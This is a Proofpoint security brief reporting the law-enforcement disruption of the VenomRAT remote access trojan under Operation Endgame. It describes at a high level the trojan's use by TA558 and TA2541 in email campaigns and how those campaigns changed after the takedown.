Security brief: VenomRAT is defanged 

What happened 

VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022, VenomRAT was used most frequently by the hotel and hospitality targeting threat actor TA558. The malware is based on the open-source malware Quasar RAT. VenomRAT is essentially a clone of Quasar RAT with some extra components bolted on from other sources. 

VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads. Some VenomRAT variants contain ransomware functionality.  

On 13 November 2025, U.S. and international law enforcement announced the disruption of VenomRAT infrastructure and the arrest of the malware’s creator as part of ongoing Operation Endgame efforts. Both the malware advertising and distribution domain (remotesystem[.]in) and the licensing domain (venomlicense[.]com) were taken down as part of the operation. The main VenomRAT suspect was arrested in Greece.

Figure 1. Screenshot of seized distribution domain.  

Campaign details 

Proofpoint frequently observes VenomRAT in email campaign data, with its prominence increasing among both unattributed threat actors and tracked TAs from mid-2024 through summer 2025.  

Figure 2. VenomRAT campaigns observed over time.  

The most prominent actor distributing VenomRAT is TA558. Tracked by Proofpoint since 2018, TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America. While the actor favors VenomRAT, TA558 also distributes other commodity malware including njRAT, Remcos RAT, and recently XWorm and PDQ Connect.  

TA558 activity accounts for 58% of the amount of VenomRAT observed in Proofpoint email campaign data since 2022. 

  

Figure 3. Distribution of VenomRAT by threat actor.  

TA558 VenomRAT campaigns typically include 1,000 messages or less with lures in Portuguese, Spanish, and occasionally English. In recent campaigns, messages contained URLs leading to a JavaScript file. If executed, the file spawned PowerShell to download and run VenomRAT. 

Figure 4. TA558 lure impersonating a complaints website, August 2025.  

The number of unattributed threat clusters using VenomRAT increased in 2024, but another prominent threat actor occasionally included the malware in its arsenal: TA2541.  This actor impersonates aviation firms to distribute malware to firms globally, most frequently in North America and Europe. Campaigns typically include less than 1,000 messages and follow a similar attack chain to TA558, with URLs leading to JavaScript files that, if executed, download and run malware. 

Figure 5. TA2541 lure impersonating an aviation charter company, April 2025. 

Impact 

The disruption to VenomRAT will cause threat actors using the malware to pivot to new payloads. Proofpoint has not observed VenomRAT in campaign data since September 2025, and TA558 has already begun favoring other malware including Remcos RAT and XWorm, with lower volumes of activity since October.  

With every law enforcement action, especially those associated with Operation Endgame, Proofpoint observes notable behavior shifts among actors that use email as a first stage malware delivery method. Disruptions often have psychological impacts alongside financial and technological ones. In this case, in addition to pivoting to other payloads, it is possible the threat actors who used VenomRAT may become more wary and mistrustful of malware providers or even concerned about their own activities being monitored by law enforcement. An arrest will also prevent the malware author from developing and selling new tools in the future.  

Operation Endgame is a widespread effort conducted by global law enforcement and private sector partners, including Proofpoint, to disrupt malware and botnet infrastructure and identify the alleged individuals associated with the activity. In May 2024, the first Operation Endgame disruption effort targeted multiple malware families including IcedID, Bumblebee, SystemBC, Pikabot, SmokeLoader, and more, and Europol called it the “largest ever operation against botnets, which play a major role in the deployment of ransomware.” The second major Operation Endgame action occurred in May 2025 and targeted additional malware families and their creators, including DanaBot, WarmCookie, Trickbot, and Hijack Loader. The major malware-as-a-service Lumma Stealer has also been targeted by law enforcement.  

Operation Endgame disruptions have significantly affected the overall email threat landscape, specifically disrupting activity attributed to known initial access broker payloads (IABs) and supporting malware families delivered via email-based campaigns. For example, in February 2023, 17% of email malware campaigns in Proofpoint data were associated with malware targeted by Operation Endgame, while that number had dropped to 1% by September 2025. 

Proofpoint’s mission is to provide the best human-centric protection for our customers against advanced threats. Whenever it is possible and appropriate to do so, and as is the case with Operation Endgame, Proofpoint uses its team’s knowledge and skills to help protect a wider audience against widespread malware threats. Proofpoint was proud to assist in the law enforcement investigations into VenomRAT activity. Proofpoint Threat InsightRead More